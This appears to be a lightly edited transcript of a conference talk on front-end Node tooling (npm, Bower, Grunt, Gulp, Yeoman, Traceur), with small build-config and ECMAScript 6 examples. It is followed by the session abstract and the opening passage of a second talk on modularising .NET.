larger project and binaries which are things that you want to execute like that Spotify command that I did. Typically, you don't run binaries from your local project. If you want to run a binary like Spotify, or if you spell it correctly, then that is one of the tools that you would want to install globally with a dash G switch. That goes into a different location on my hard drive and it is a place where I can reach that tool from anywhere. You can see the location there. Typically when Node installs, it will set that up in your path for your computer. Anytime you open up a command prompt, anything that you have installed globally, you should just be able to run from the command line. It just works. I could do something like NPM install Bower dash G. Bower is one of the tools that we are going to look at. Depending on the Wi-Fi connection, this might or might not make it. It will go out to the repository and much like NuGet, sometimes download zip files or tarballs, bring them down to the local hard drive, explode them out, decompress them. It also understands dependencies. You can see a lot of things scrolling by now because Bower is a tool that depends on things like the underscore library. The person that builds the Bower package will just describe those dependencies in a manifest file so that NPM knows how to bring down everything that Bower needs. It looks like we completed. Since I installed that globally, I can just type Bower now. We are going to talk about what Bower is. Yes. An example of using NPM from the command line. A lot of the command line tools for Node use a CLI prefix or suffix so that you know it is a command line interface package as opposed to a library that you might reference. Here are the basic NPM commands that you want to know.
First of all, when I am in a brand new directory and there is nothing inside of it but I am ready to start up a project, I might want to run this NPM init file. What NPM init will do is ask me a couple questions and then set up a manifest file for me. Let me just create a temp, temp directory and say NPM initialize. What is the name of my project? It is temp. What is the version I can put in? Whatever version I want. Just a bunch of basic questions so that the end result is a JSON file which looks like this. You don't need all of this stuff all the time but this is the name of my project, the version and then we are going to see that any time I install something for this project, it is going to be listed as a dependency inside of this JSON file somewhere. Backing back out for a second. This is a package.json file for a project that has a run time dependency on a Node module called Q which is quite popular for asynchronous programming and it has a development dependency on a tool called grunt which we are going to look at. NPM does allow you to make a distinction between things that have to be there to run in production like the Q library, I need that because the program actually uses that and then development dependencies which are the things that other developers will need on their workstation in order to be able to do a build. Then when you NPM install something like Q, NPM install Q, you can specify dash dash save to make sure that entry goes into the JSON file as a dependency or you could NPM install a tool and say save dev, save dev dash dev to tell NPM that this is a developer dependency so put it in that dev dependency section. Then those will all go into a folder called Node module so let me come over here and say NPM install Q dash save that installs Q, very small library so that was very quick. Look at package.json you can now see that is a dependency and if I go into Node modules there will be a Q folder there. One of the nice things that NPM will do is always install these things into their own dedicated folder and it's actually pretty good at managing dependencies because if Q did have a dependency on some other library let's call it foo version 1 that will actually be nested under here, it won't be another top level folder and that just means if I install two things and one depends on foo version 1 and this one depends on foo version 2 since those dependencies are nested under those separate top level folders it actually all just works and part of that is because of the way the Node module system works because those pieces are completely isolated from each other when they are running. But then what you typically do when you are working on source controls you don't check in the Node modules folder just like with NuGet it's quite common to not check in your packages folder with all the binaries in it instead you just check in package.json so another developer comes on your machine he clones the repository gets down package.json and then he'll just type npm install and that will look in the json file and say oh I see you're using Q let me bring it down and put it in here and it can track specific versions and things like that. Making sense so far? Quite wonderful. All right those are the npm basics and of course there is an uninstall command. 
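Putting those npm basics together, the package.json for a project like the one in the demo ends up looking roughly like this (the version ranges are illustrative, not the exact ones on screen):

```json
{
  "name": "temp",
  "version": "0.0.0",
  "dependencies": {
    "q": "~1.0.1"
  },
  "devDependencies": {
    "grunt": "~0.4.5"
  }
}
```

The runtime dependency came from `npm install q --save`, the development dependency from `npm install grunt --save-dev`, and another developer who clones the repo only needs `npm install` to restore both into node_modules.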
One of the things I want to install which I installed globally already is a package manager called Bower so a different type of package manager npm is all about stuff that runs in Node or on top of Node where Bower is a package manager that is dedicated to packages like AngularJS, Bootstrap, Ember, Durandal, animate.css so anything that is a JavaScript library or framework like everything from jQuery to underscore to Angular or anything that is a CSS framework anything that loads into a browser there is probably, there's a 99% chance, going to be a Bower package for that which is one of the reasons I switched to Bower from NuGet for front end packages. Well actually there's a couple reasons. One reason is anyone today who is building a JavaScript library or framework the first package management tool they are going to target will be Bower so as soon as they release any sort of new build or patch or fix or anything like that the Bower file will be updated instantly and you can come by five minutes later and say Bower install or Bower update to the latest version and it will be there. Whereas NuGet is very much I don't want to say it's a second class citizen but there's a lot of people writing JavaScript that don't care about NuGet. Someone else, a third party, has to write a NuGet package and a nuspec file to package up that JavaScript and get it into your project. That's one reason I prefer Bower for JavaScript and CSS. The other reason is that quite honestly NuGet just has not done a good job of figuring out a convention on where to place stuff. So if you start, if you've been through this experience of NuGetting Angular, jQuery, Bootstrap and all these other front end tools they get dumped in all sorts of places inside of your project sometimes under the scripts folder, under the content folder. They fill up quite rapidly. Bower is very unopinionated about how a package should be put together. I'll show you that. It's a bit disconcerting at times but I do know if I say Bower install Angular I know exactly what folder it's going to go into and it's going to be a folder dedicated to that Angular package. I don't have to worry about it filling up another folder inside of my project somewhere with both minified files and unminified files and source maps and all that other stuff. So Bower, you get started using that command I used earlier, npm install Bower dash g to install it globally and once you have done that you will be able to Bower install different packages. The one catch is that Bower, npm sort of stands alone. If you have node installed you can use npm, you don't have to install anything else. If you install Bower the way it pulls down packages is to rely on a Git client of some sort. So you will have to install a Git command line tool into Windows and you can do that with Git for Windows which used to be called msysGit. I've even had it work with posh-git which comes from the GitHub client for Windows which is a nice graphical user interface but it also taps into PowerShell to add some Git commands to it. So Bower will work with either one, just make sure you have that Git client and now just like npm, everything we learned about npm almost directly applies to Bower. There is a Bower init command that will create a JSON file for me that describes all the packages that I'm going to store. When I Bower install a package I can say please save that as a dependency or please save it as a development dependency. And then I don't have to check in my Bower components.
All I have to do is check in bower.json as the name of that file and then other developers when they clone the repo they just say Bower install and poof, Bower will bring everything down and keep them up to date with what I wanted everyone to have. And then there is Bower update so I just want to update every possible package to the latest version that's out there. Always a little bit dangerous because when you update everything and change to the latest version something inside of there will break. So you'll spend a few minutes debugging things. But let's say that I wanted to come back to the previous folder I was in that was under a desktop folder unfortunately. There we go. And you can see inside of here I already have a JSON file one of my only dependencies right now is Q unit because I want to show you how to run some automated tests from here. But and that's a development dependency because I'm not going to run Q unit in production. But let's say I wanted to use AngularJS I could Bower install or even JQuery, Bower install JQuery, goes out, fetches JQuery and I forgot to put in dash dash save so I would have to come back and make sure I do that to get it into my JSON file. But once that is complete, let me open it up Explorer here. I will now have not only node modules but also Bower components and inside of Bower components I can see some things that are in the correct location. I actually installed some things here which are not in my JSON file. I actually don't need some of those. But there's JQuery and here's the disconcerting part. Bower is not opinionated about what people should put into their packages or what is the folder structure that should be underneath of this package when it has expanded. So when I Bower install JQuery I can be guaranteed that JQuery will always appear in that folder. But let me give you a different example here real quick. Let's Bower install, install, Jasmine dash save and while that's happening I'll just show you inside of JQuery there's a DIST folder. Now usually that's where you want to go. I want to go into the DIST folder because that's where they put the files that you want to use. That's the distribution. So there I can see JQuery, a minified JQuery and a source map for JQuery to help with debugging. And there's a lot of projects that will follow that same convention. All you have to do is drill into there and find that distribution directory. But then there's things like Jasmine which if I come into the Jasmine folder and go into the distribution folder there's zip files which aren't immediately helpful. What I really want is to find a jasmine.js file and a jasmine.css file. Jasmine's a test framework in case you haven't used it. And if you poke around enough you will find it in here. I believe it's under lib if I remember. These are the files that I actually want. Usually those four load into a page to run some unit tests. So there's a little bit of inconsistency there. And no one really documents where they put stuff. They just expect you to be able to bower install and figure out where it went into that folder. But it's always there somewhere. And what's that all I had to say about bower? Oh, if you're using Visual Studio, so this is kind of my common workflow now. Instead of a project I might start in Visual Studio, ASP.NET, MVC. I will check in my bower.json file at the root of the web project. And I will have my bower components folder included into the project. 
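For reference, the bower.json being built up in this demo would look something like the following; package versions are illustrative and the qunit entry reflects the earlier test dependency.

```json
{
  "name": "temp",
  "version": "0.0.0",
  "dependencies": {
    "jquery": "~2.1.1",
    "jasmine": "~2.0.0"
  },
  "devDependencies": {
    "qunit": "~1.14.0"
  }
}
```

Only this file goes into source control; the bower_components folder itself is restored on another machine with a plain `bower install`.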
But not if I'm using TFS I wouldn't want to include everything because then TFS likes to check everything in. But I might cherry pick out specific files from bower components that I include into the project that's not necessary at all. So this Angular folder might contain 50 directories inside of it and 10,000 files. But really the only thing I care about from inside of Visual Studio is that one JS file that has to get loaded up. And I might pull them into the project like this just because then Visual Studio understands that JavaScript a little better. You can drag and drop that file into a web page and things like that. Otherwise developers open up the project file. If the bower components folder isn't there sometimes it's a little bit confusing. So I will include that there. If it happens to be a bigger solution that has multiple web projects inside of it then maybe move bower components out to the root of the solution. So all of those bower components can be shared from multiple web projects and just link them into that particular project. That works well. So now that you have all of those front end tools downloaded now you have to figure out how do I take this JavaScript and concatenate everything together, minify it. I'm writing so much JavaScript that I might want some sort of linting tool to run through it and tell me if there's any potential problems with the JavaScript that I have. That's where tools like grunt and gulp come in. We'll talk about grunt first. It is the oldest task runner. I don't know if it is the oldest but it's certainly more mature than the other one we'll talk about. What you do is you define tasks for grunt. I want you to look at this directory, concatenate all the files together, write a new file into this folder, then minify it, all those sorts of things. You can do that all with grunt. The way you install grunt is it's one of these command line tools that runs on top of node but there's a few command line tools for node that follow this pattern. First of all you're going to install some piece of it globally and that allows you to go up to the command line and just type grunt. But typically that piece of software is a very small wrapper around a local installation of grunt that will install in node modules underneath the current folder where you run npm. The basic idea here is that grunt CLI is brainless. It's just there so you can type grunt from the command line. All the real work is going to be done by that local installation of grunt. But that approach, what that allows for is if there's ever a breaking change in grunt, you can still have grunt version one for this project and grunt version two for this project and still be able to run grunt from the command line and not worry about having to keep all those things in sync because they both have their own local copies of grunt that when I type grunt it just gets forwarded to that. So what are some of the things you can do with grunt? Well if you like to write coffee script or type script, you can use grunt to compile those files into JavaScript. If you write less, there's a grunt task to compile less into CSS. If you use handlebars or a framework that depends on handlebars, you can pre-compile handlebar templates so that they are executable JavaScript and then that doesn't have to happen at runtime and can save you some performance. 
There's optimizers for RequireJS modules, JS Hint which is a wonderful tool to scan your JavaScript files and say, you know, you're doing something that looks a little bit fishy here. Maybe you should fix that. So let me show you a grunt file and, well, the different types of tasks that we can do with it. So if I open up gruntfile.js, the way a grunt file works is there's just three major pieces. First of all, the grunt file that you write is written as a node module. So you have to do this module.exports equals function that's literally saying, hey, I'm building this function that I'm going to give to you that you're going to invoke and pass yourself in and inside of this function I'm going to tell you everything, all the configuration options that you need to know about. Then there's this init config section. Before we talk about that, let me scroll down to the bottom and just focus on these things first. These are tasks that I need to execute. So Uglify is minification, JS Hint is linting, QUnit is a unit testing framework, watch is something that can watch the file system and run stuff whenever a file changes and concat puts everything together. These are all additional modules that I would need installed, node modules that are going to run in node. So if I want to use JS Hint to lint my code from a grunt file, one of the things I will have to do is npm install grunt-contrib-jshint, which I already have installed so I'm not going to do that again and I would usually do that with a dash dash save-dev. So npm install grunt-contrib-jshint --save-dev. So that module is available to load in when grunt is executing. That's the code and the logic behind the hinting. Once that is installed with npm, then you tell grunt to load that npm task. That's basically like establishing an assembly reference. You could think of it that way. Once that is available, we'll focus on concat first, once concat is available, when I enter this configuration file, I basically need to tell concat what to do. So I want you to build a distribution of my files by looking at all the JavaScript files that are in this source folder, concatenating them together and putting them into a single file called demo.js, which is in the destination folder, or distribution folder, sorry. Let me come to that folder once and just show you that I can blow some things away inside my distribution folder. Let's get rid of everything inside of there. So that's basically empty. And then I can come in and now that I have that grunt file, sorry for making people nauseous by zooming in and zooming out, now I can say grunt concat. And by default, grunt looks for a grunt file in the same folder and I told it to run concat. So it goes into that configuration and says what is concat? Oh, I see that task. I see that you wanted to build this distribution/demo.js file and so that just happened. Now I have demo.js, which is actually just a short demonstration of putting two other JavaScript files together. Again, we still have time, right? Yeah, okay. We got slides to go through. Here's Uglify. So I want to minify that file now. I want you to build demo.min.js from that file. So let's go over and do a grunt uglify. And it will tell me, hey, great, you just saved 10 bytes by squishing down that file. If I look at distribution/demo.min.js, yeah, stripped out some carriage returns and some white space, I guess. And we can continue going through this grunt file, but you can see individual tasks here that are set up.
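A trimmed-down sketch of the kind of Gruntfile being walked through here, showing the concat and uglify configuration plus the loadNpmTasks calls; the folder names and glob patterns are illustrative.

```js
// Gruntfile.js: a node module that receives grunt and configures it
module.exports = function (grunt) {

  grunt.initConfig({
    concat: {
      dist: {
        src: ['src/**/*.js'],        // every JavaScript file in the source folder
        dest: 'dist/demo.js'         // concatenated into one file in the distribution folder
      }
    },
    uglify: {
      dist: {
        src: 'dist/demo.js',
        dest: 'dist/demo.min.js'     // the minified version of the concatenated file
      }
    },
    jshint: {
      files: ['Gruntfile.js', 'src/**/*.js', 'test/**/*.js']
    }
  });

  // each of these plugins was npm installed with --save-dev
  grunt.loadNpmTasks('grunt-contrib-concat');
  grunt.loadNpmTasks('grunt-contrib-uglify');
  grunt.loadNpmTasks('grunt-contrib-jshint');
};
```

With that in place, `grunt concat`, `grunt uglify` and `grunt jshint` each run their individual task against this configuration.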
When I run grunt qunit, I want it to load up all of the HTML files that are in my test folder and execute tests inside of a tool called PhantomJS. Anyone here used PhantomJS? It's basically a headless web browser. So it's a web browser that doesn't have a UI, doesn't appear on the desktop, which means it's a great browser to use for things like your build server, the command line, or continuous integration. Unfortunately, it does have some drawbacks. It's based on WebKit, but it's not always up to date. It doesn't have some of the ES5 things that I need sometimes. But yeah, basically run my QUnit tests in PhantomJS and tell me if things passed or not. So I just have a single simple test inside of there and it passed. And then jshint. Oh, let me show you some JSHint things actually that are interesting. So this file, let me open up in source, oh no, sorry, in my test folder. I have a little bit of JavaScript here that works, but there's an issue with it. In JavaScript, there's no block scope. You probably know this already. There's no block scope in JavaScript. So if I declare a variable inside of a block like this, inside of an if condition, it's as if I declared that variable at the top of the function. So there's no real point in using the var keyword and declaring a variable inside of here. And the problem is I'm declaring it inside of here, and I might be thinking JavaScript has block scope, and I'm referencing it out here. It's just a mess. Well, these are the types of things that JSHint can find. Currently this option is called funcscope. If you look in the documentation for JSHint, funcscope is an option that, if you set it to true, it will no longer check for that particular condition where a variable is declared inside of a block and then used outside of it. But if I turn that flag off or remove funcscope, and now I go back and say, dear grunt, please jshint my files, it will tell me that x is used out of scope. So it detects that problem, and that's when I could come in and someone could fix that file by, you know, initializing x to some initial value, and only if the condition is true then we could say x is 3. That would fix that problem. I should be able to run this again and it will be happy. So those are individual tasks that I'm running with grunt, and typically what you do to set up a real build system then is you define other tasks that can execute the sub tasks. So if I type grunt test, I want two things to happen. I want jshint to run over all of my files and then I want qunit to execute my unit tests. The default task, which is what we'll execute if I just type grunt with no other parameters, is to go out and jshint things, run the tests, concatenate everything together, basically build a distribution after all the tests and hinting have completed. So if I just type grunt, it will go off and run all of those steps for me. So that would be, you know, something that I might do during a build, and I could register as many of these different tasks as I want and use different combinations here. Now what I also have set up though is a task in here called watch. So it might be that as I'm developing, I want grunt to continually watch things in my file system, and this is a template syntax. This is basically saying watch all the same files that are specified here, and if any of them change, do these two things. Immediately run jshint and run qunit. So if I come out and type grunt watch, then it will tell me it is watching and it's waiting for something interesting to happen.
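As an aside before the watch demo continues, the scope problem JSHint catches here, and the way the combined tasks get registered, look roughly like this (funcscope is the real JSHint option name; the rest is a sketch):

    // test code that works, but only because JavaScript hoists var declarations
    function demo(condition) {
      if (condition) {
        var x = 3;   // looks block scoped, is actually function scoped
      }
      return x;      // JSHint warns "'x' used out of scope" unless funcscope is true
    }

    // back in the Gruntfile: composite tasks that run the individual ones in order
    grunt.registerTask('test', ['jshint', 'qunit']);
    grunt.registerTask('default', ['jshint', 'qunit', 'concat', 'uglify']);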
And if I come into, like, a simple.js file and save it, you'll see there in the background grunt just runs everything. Runs the tests, runs jshint, which is interesting. Now, I do occasionally run into problems with the file system watcher, with grunt watch, where it doesn't detect changes or it doesn't detect changes in a specific folder, and I thought that might have been a Windows thing, but in talking to people that use OS X, it also happens there sometimes. But sometimes just rebooting or resetting it helps. The other thing I've had problems with with grunt is if you start grunt watch at 9 o'clock in the morning and then you work all day and then maybe shut down the computer and come back to it in the evening, if it's been running for 10 or 12 hours, sometimes it starts creating these temporary files in the file system that you can't delete and it starts missing watches. But just killing it off and restarting it works pretty well. Questions so far? Live reload, I don't have a demonstration of that, but I like live reload. So live reload is a way to tell grunt, the watch task specifically, to also set up a little server that listens on a specific port, and then you can download an extension for Chrome. Yeah, an extension from the Chrome Web Store that sits right there in your menu, and if you click that, it will communicate with the web server that grunt has set up, so that anytime a JavaScript file changes, yes, all the tests will run, JSHint will run, but it will also tell the browser to reload the current page. So you just get a nice experience where you save a file and everything refreshes, which is kind of nice. So the advantage to grunt is, if you go and look at what grunt plugins are available, you will come to a page on their site that says there's, as of this morning, almost 3,000 different entries, 3,000 different things that you can npm install and then load up into your grunt file to do different tasks. Things like compile from TypeScript to JavaScript, minify all my images, compile my Handlebars templates, minify my HTML, run my Jasmine specifications. If I'm using RequireJS, I can go through all the requires and figure out the dependencies and do some optimizations. Angular templates is a neat little plugin that I've used, because in Angular you use a lot of partial views or HTML templates that are scattered all over your web server, and every time you load up a directive or load in a new ng-view, Angular has to go off and fetch that HTML. That package just builds them all together, concatenates them and loads them into a special place in Angular called the template cache, so they're already in memory as soon as you download the JavaScript file that comes out of that. Lint my CSS, lint my JSON files. All sorts of wonderful things out there for grunt. The downside to grunt is, at least for me, and I know other people that feel this way too, it's a mentally taxing exercise to modify a non-trivial grunt file, because you write all these object literals that are strung together and it's very easy to forget a comma and get the source out of whack. It feels like writing XML configuration after a while, just writing all these objects everywhere. A tool that came along much later than grunt is a tool called gulp, and it does the exact same things. You install it the same way. I npm install gulp globally, which installs a little wrapper out there. I npm install this gulp tool locally and save that as a development dependency.
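A watch configuration with live reload switched on might look something like this inside grunt.initConfig; the port shown is the conventional livereload port, an assumption rather than something from the demo:

    watch: {
      scripts: {
        files: ['src/**/*.js', 'test/**/*.js'],   // the same globs the other tasks use
        tasks: ['jshint', 'qunit'],                // run these whenever a file changes
        options: {
          livereload: 35729                        // start the little server the browser extension talks to
        }
      }
    }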
The difference between grunt and gulp is that whereas grunt feels very declarative about the way you build your tasks out, with gulp you write more imperative code. You actually write JavaScript functions and have a sequence of statements inside of them. Let me show you a gulp file. That's one significant difference. I'll explain another one here in just a bit. That is our grunt file. Let me kill the watch, open up the gulp file and scroll down a little bit. Now you can see here's grunt, here's gulp, grunt, gulp, grunt, gulp. It's like an exercise. Instead of writing object literals that say here's my configuration, what you do is say I want a task called concat. What I want you to do is go out and grab all these source files, and it also understands globbing patterns. If I say star, star, slash, it would say inside the source folder and everything underneath it, recurse through all directories, pick up all the JavaScript files. What I want to do is pipe them into the concat task, which knows how to take 10 files and put them into one. The pipe is very significant, because grunt really has these isolated tasks where you say, okay, I want to concatenate things, I want to have this grunt concat task which puts everything together, writes out a file. Then another step will read that file, do something to it, write out another file or overwrite a file. With gulp, what you can do is use streams. This is using node streams behind the scenes so that there's not as much file system activity. Read all these files and just pipe them through memory to this other task that concatenates things, and then pipe them through to this other task that knows how to write to the file system into the distribution directory. Gulp concat, just like grunt concat, will build a single file for me with all of my contents put together. I can do the minify, I can do JS hinting. These tasks don't have to be isolated like this. I could just have a task called build which goes from concat and pipes into this and pipes into that and pipes into another thing. Let's look at this. Not as many plugins are available for gulp because it is newer. I'm still using grunt files for everything, but I want to migrate to gulp. I find that managing that file is a lot easier. I should also show you down here at the bottom. There's fewer packages, but all the big ones are there. You want to watch things, you want to run QUnit, you want to run Jasmine, concatenation, minification, all the things that you probably need are there. Here's my default task. Just like my grunt file had a default task, I have a default task here which is: run lint on everything, run the unit task, concat everything, minify it. There's a watch task where I can say basically watch these folders. Anything changes in there? Run test. I would probably want jshint inside of there too. Anything in this folder changes? Run this thing called traceur, which I'll talk about here in just a second. So that's grunt and gulp. If I were to be starting a new project today, I would try to start with gulp personally. Yes, next slide. Yeoman. Yeoman is not a tool that I've actually used extensively. I'll explain why in just a bit, but I know some people who have a lot of success with it. It's basically a generator. If I don't want to start a grunt file from scratch or a Jasmine test from scratch or an Angular application from scratch, then I can go out and npm install Yeoman globally. At that point what I could do, let's make another directory called angular-ndc.
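Before the Yeoman part continues, here is what that streaming style looks like as a minimal gulpfile sketch; gulp-concat and gulp-uglify are the plugin names I am assuming:

    var gulp = require('gulp');
    var concat = require('gulp-concat');
    var uglify = require('gulp-uglify');

    // read the sources once, then pipe them through memory:
    // concatenate, write the combined file, minify, write the minified file
    gulp.task('build', function () {
      return gulp.src('src/**/*.js')
        .pipe(concat('demo.js'))
        .pipe(gulp.dest('distribution'))
        .pipe(uglify())
        .pipe(concat('demo.min.js'))
        .pipe(gulp.dest('distribution'));
    });

    // rerun the build whenever a source file changes
    gulp.task('watch', function () {
      gulp.watch('src/**/*.js', ['build']);
    });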
I'm going to build an Angular application. Hang on, fingers. angular-ndc. I'll type yo angular. What that will do is scaffold out an application for me with Angular.js set up. It'll ask me a few questions here. Do I want to use Twitter Bootstrap? Sure. I want to use these different Angular modules. It'll spit out a whole bunch of stuff, including the Bower files that I need and the npm package.json file that I need. This is all wonderful, but it's all oriented really for node developers. If you try to take this particular thing that is being generated and use it from ASP.NET MVC, it becomes a little bit difficult just because the folder structure doesn't always line up the way you want it to. If you've ever thought that File New Project inside of Visual Studio put out a lot of stuff, you can do that from the command line too. It doesn't require a UI to put 50 megabytes of stuff on the hard drive. That will continue on for a little bit. The interesting thing about Yeoman though is, in addition to scaffolding out big things like an entire application, and this would also include everything I need for Angular, inside of that scaffolding engine are also some interesting things which I want to look at and maybe tweak to see if I can use them from something like an ASP.NET MVC project. Let me kill this all. Because now once this is set up I can say, yo, I want to create an Angular controller called ndc-sessions. This is nice, because sometimes when I do want to create a new controller in Visual Studio it's a bit of a pain to go out and say I'll create this controller file over here and create the test file for it over here. This makes both of those for me. That gives you a nice little scaffolded start. If I go to app/scripts/controllers/ndc-sessions.js, that's the start of a controller that I can use. If you go out and look, there's documentation on how to build your own generators, your own scaffolding. There's lots of people writing all sorts of custom generators. There's people that have written generators for Angular, I know, that will dump out a data access layer for a particular web API or a service layer for a particular web API. It's an interesting technology. I just wanted to mention it in case it's something you could make use of. Then the last thing that I wanted to mention is Traceur. When I started a project a few months ago, we were trying to be very forward looking with this particular project, because it's going to be around for hopefully more than five years, maybe ten even. We decided it would be interesting if we could work some of the ECMAScript 6 features into the application, because there are a few things that I particularly like about ECMAScript 6. The problem is, if you write ECMAScript 6 right now, it's not like you can just deliver that JavaScript to a browser. Internet Explorer 10 or even the latest version of Chrome doesn't really support everything. However, there are transpilers out there like Traceur which can take ECMAScript 6 source code and rewrite it so it can run in an ECMAScript 5 browser, potentially with just a few additional polyfills inside of it. I started exploring Traceur. I'll be honest, the verdict is still out a little bit on this. Here are some of the things I would like to do. Let me open up a file. Let me go back to, I should have done a pushd to that folder, and you see Oslo node tools. Here we go. Open up under my source folder. I have a file called employee.js, because this uses an ECMAScript 6 class definition.
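Picking the Yeoman commands out of that demo before the ECMAScript part, they go roughly like this; generator-angular is the generator package name I am assuming was installed:

    npm install -g yo generator-angular    # yo itself plus the Angular generator
    mkdir angular-ndc && cd angular-ndc
    yo angular                             # scaffold a whole Angular app (asks about Bootstrap, modules, etc.)
    yo angular:controller ndc-sessions     # scaffold just a controller and its matching test file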
There's really crazy things coming in the next version of JavaScript. A JavaScript class that has a constructor, so I can use the new keyword and say new Employee and pass in a name. This is a default parameter in ECMAScript 6. That's something we could do today by saying something like name equals name or some default value, but it's a little more intention revealing when it looks like this. In fact, it looks like C sharp at that point. There's property getters and setters. There is a let keyword. Let does give you true block scoping. If I were to say something like, if true, let x equal 3, that would live only inside of that block. There's also a const keyword. I can say x is 3 and it always has to be 3. Throw a runtime error if someone tries to write into that variable. This is one of my favorite parts of ECMAScript 6. Kind of an ECMAScript tangent here. The arrow function. Looks familiar if you've done any C sharp. It really behaves the same way. If I want to write a function called square, instead of saying let's write a function that takes a parameter x and returns x times x, what they allow you to do is get rid of the function keyword, get rid of these parentheses, get rid of the curly braces, just use the arrow operator, or the goes-to operator. Don't need a return keyword. Looks just like that. If I wanted something that took two parameters, that's when you have to use parentheses, and return x plus y. If I want something that doesn't take any parameters, empty parentheses, console.log, hello. Just like C sharp. Just like C sharp. That's something I want to use. The other huge advantage to arrow functions is, I have a member out here which is this._name. You've probably experienced this problem where, if you do anything asynchronous like have a setTimeout call or an HTTP call, if I try to say console.log this._name here, does that work? Probably not, because my this context has changed to be something else. It's probably the window object now. I don't get that reference. You guys have run into that, or you've seen something like var self equals this to prevent that. With arrow functions, if I use an arrow function here instead of the function keyword, and yes, you can still have parentheses in the definition, it can be multiple lines, the this keyword lexically binds to the outer function where it's defined. Those two will be equivalent, which is kind of nice. You don't have to do as much self-equals-this type stuff. Anyway, to get this to actually work anywhere requires Traceur. If I look at my gulp file, I have a task set up for Traceur to take that file and build it into a distribution folder, including some experimental features that are inside of it. If I gulp traceur and then look in my distribution folder, that's what comes out, and it uses the Traceur runtime. You have to include that too. Still experimenting with this and trying to figure out if it's something that's really safe for production or not. I do know other project teams that are doing this. Like the Angular team, they're actively writing stuff in ECMAScript 6 and using Traceur to transpile it into a current version of JavaScript that actually runs in browsers and things like that. I think it's worthwhile for everyone, even if you love Visual Studio and you love C sharp and you're doing a little bit of JavaScript, to at least take a look at some of these node tools, because I have found they've been very easy to work with.
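Pulling those ECMAScript 6 features into one condensed sketch (the Employee name comes from the demo; the default value and the doWork method are invented here for illustration):

    class Employee {
      constructor(name = 'Scott') {          // default parameter value
        this._name = name;
      }
      get name() {                           // property getter
        return this._name;
      }
      doWork() {
        // arrow function: "this" binds lexically, so this._name still refers
        // to the employee even inside the asynchronous callback
        setTimeout(() => console.log(this._name), 500);
      }
    }

    const square = x => x * x;               // const: cannot be reassigned
    let total = square(3);                   // let: true block scoping

    new Employee().doWork();                 // logs "Scott" after half a second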
I honestly feel that they have made me more productive, and they're good for the products that I am building. Questions? Yes? Can I use these tools together with MVC and Web API? Yeah, Web API is all server-side stuff. You could certainly, if you're building something that uses that Web API with JavaScript and all, certainly use these tools to lint the JavaScript and all that. Yeah, yeah, yeah, sorry, I got that now. I haven't even tried this, but there are grunt and gulp tasks that allow you to execute shell commands. You could certainly shell out to MSBuild. Thank you. There was another one. Oh, same thing. You just want to replace MSBuild with this? Yes, I think it would be possible. I know the next version of ASP.NET, which is being described over here, relies on a JSON manifest instead of a csproj file. This might be the direction we're headed in any case. More questions? Well, thank you for coming. I'll hang around here if you do have any questions. If you want to contact me, I think my name's Scott Allen. I'm relatively easy to find. If you just Google for OdeToCode, you can find a way to get a hold of me. Thanks for coming. Thank you.
|
Bower, Grunt, Gulp, and Yeoman are tools you can use to help your front-end development regardless of the server side technology stack you use. In this session we’ll see how to use Node and the Node ecosystem to power your development in HTML, JavaScript and CSS, and discuss the strengths and weaknesses of the various tools and processes.
|
10.5446/50867 (DOI)
|
All right. I wasted some time. Cool. Hi. Oh my goodness. Hello. My wife is not impressed with what I do. Just wanted to make the point. What did you do over there? Talked to some people. Mostly editing configs. Okay, cool. So let's do this. Let's do some random and pointless slides that were designed by someone who is good at slides, and then try something that's totally off script because there's no script. I'm Scott. Thank you very much for climbing up there. If somebody yells fire, you're all going to die. I don't want to make sure you're okay. We would never build something like this. Just think about this from an American's perspective. I am suspended. I'm the one you came to see, and they've got me with six ropes, and then you guys are at an angle that is about 30 degrees more than an American would allow. Because we would walk two steps, fall, and then sue the entire place. It's completely unacceptable. I was in Zimbabwe on the Zimbabwe and Zambian border, and we were there looking at the waterfalls. It's this huge waterfall, Victoria's Falls, and there's no fence. There's just some brambles about this tall. I asked the guy, like, what happens if someone falls? He's like, well, they are dead. And I was like, well, I mean, shouldn't someone be upset? Aren't they going to sue you? And he's like, they're dead. Why would you allow this? How is this okay? He's like, don't stand near there. So that's what we're doing with ASP.net. Oh, God, this is so uncomfortable. You really should try this at some point. Okay, I'm Scott. I am one of the lesser Scots. Microsoft has one major Scott, which is a great Scott, Scott Guthrie. And then there's three or four minor Scots. And then Scott Hunter and I are referred to as the lesser Scots, or Scots the lesser. It's like attorney's general. And that is an actual thing. Like, this has become a thing. It was a joke, and now it's an actual thing. And they will ask in meetings, well, you should check with the lesser Scots. And they're referred to as a group. And we're not allowed to have opinions that differ. We have one collective opinion that we have to vote on amongst all of the lesser Scots and then present that idea. So there's great Scott who overrides whatever we think. And then there's our opinion. So I want to talk about what's going on with.net and server. Now there's two talks going on here. There's this talk, and then after this one, if you want, David Fowler and Damien Edwards are going to do an entire hour of Q&A. And not Q&A in the boring way where they answer questions. Q&A in the exciting way like, what if we did this, and then David will code it on stage. He doesn't know that, but I just said it, so now that's... That's now a thing. By the way, you're doing that later. So their talk has no slides. It is just David coding. And then Damien is a program manager, not a coder. So Damien will point over David's shoulder and say, I forgot the semicolon. Damien will also delete email, which is what program managers do. Okay. Blah, blah, blah, animation, blah, blah, blah, marketing, blah, blah, blah, build slide, build slide, build slide, build slide, build slide, blah, blah, blah. Yada, yada, yada, standards, blah, blah, blah, line of business. I mean, I want to respect your time. Let's watch some YouTube videos. I respect your time. All right. We're doing some new stuff in.NET, if you haven't heard. Any people here totally not.NET people and just came for the snacks? You came for the snacks? I know that they did. Okay, good. 
So it's not your Pappy's Microsoft. We've changed a lot of stuff. We're doing modular releases. We've broken up. We are breaking up.NET a lot smaller than it was before. Before, if you think about.NET, it started shipping, I think, with Windows around, was it NT or Windows? What's the first Windows that shipped.NET? Windows 7? Vista did. Vista shipped.NET. So that was both a good thing and a bad thing. From an adoption perspective, it was like, hey, Windows, other than the fact that it was Vista, here's an operating system and you can be assured that.NET's on it. That's a good thing, or it was a good thing at the time. The bad thing, though, is that.NET doesn't really get updated unless you have this giant installer of hundreds and hundreds of megs and a reboot and then another reboot and then a couple of reboots after that reboot. And then all of that stuff is guaranteed to be there. But then if we update.NET in some way or we change something in the GAC, the Global Assembly Cache, everything in.NET breaks. So you can understand why they did it, but at the same time,.NET kind of needed to be broken up. We couldn't make a change. If you found some horrible bug in.NET that exists in Windows, ships with Windows, it provided us with really no agility at all. We couldn't fix.NET quickly. So the Global Assembly Cache was a problem. The fact that.NET shipped with the operating system was a problem and it basically did not allow us to do be flexible, be open, be agile, innovate, or any of those things. So we're doing the exact opposite. And we're putting as much as we possibly can in the.NET foundation. So basically 